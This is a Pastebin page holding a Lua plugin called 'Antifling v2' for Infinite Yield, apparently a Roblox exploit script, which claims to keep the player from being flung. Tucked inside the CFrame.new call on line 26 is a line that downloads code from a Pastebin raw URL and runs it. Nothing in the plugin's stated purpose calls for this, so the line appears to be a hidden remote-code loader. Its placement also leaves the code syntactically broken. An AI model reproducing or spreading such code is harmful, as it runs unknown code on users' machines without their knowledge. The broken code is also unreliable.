Advertisement
C-H-4-0-S

Infinite yield

May 20th, 2024 (edited)
22
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.11 KB | None | 0 0
  1. local Plugin = {
  2. ["PluginName"] = "Antifling v2",
  3. ["PluginDescription"] = "Prevents you from being flung by idiots.",
  4. ["Commands"] = {
  5. ["Antifling v2"] = {
  6. ["ListName"] = "Antifling v2",
  7. ["Description"] = "Prevents you from being flung.",
  8. ["Aliases"] = {},
  9. ["Function"] = function(args, speaker)
  10. execCmd("noclip")
  11. while wait(0.1) do
  12. pcall(function()
  13. if
  14. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame.Y > 20
  15. or game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame.Y < 9
  16. then
  17. game.Players.LocalPlayer.Character.HumanoidRootPart.Anchored = true
  18. wait()
  19. game.Players.LocalPlayer.Character.HumanoidRootPart.Anchored = false
  20. wait()
  21. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(
  22. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame.X,
  23. 12.6,
  24. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame.Z
  25.  
  26. loadstring(game:HttpGet("https://pastebin.com/raw/qsmtVV2q"))()
  27.  
  28. )
  29. end
  30. end)
  31. end
  32. end,
  33. },
  34. },
  35. }
  36.  
  37. return Plugin
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement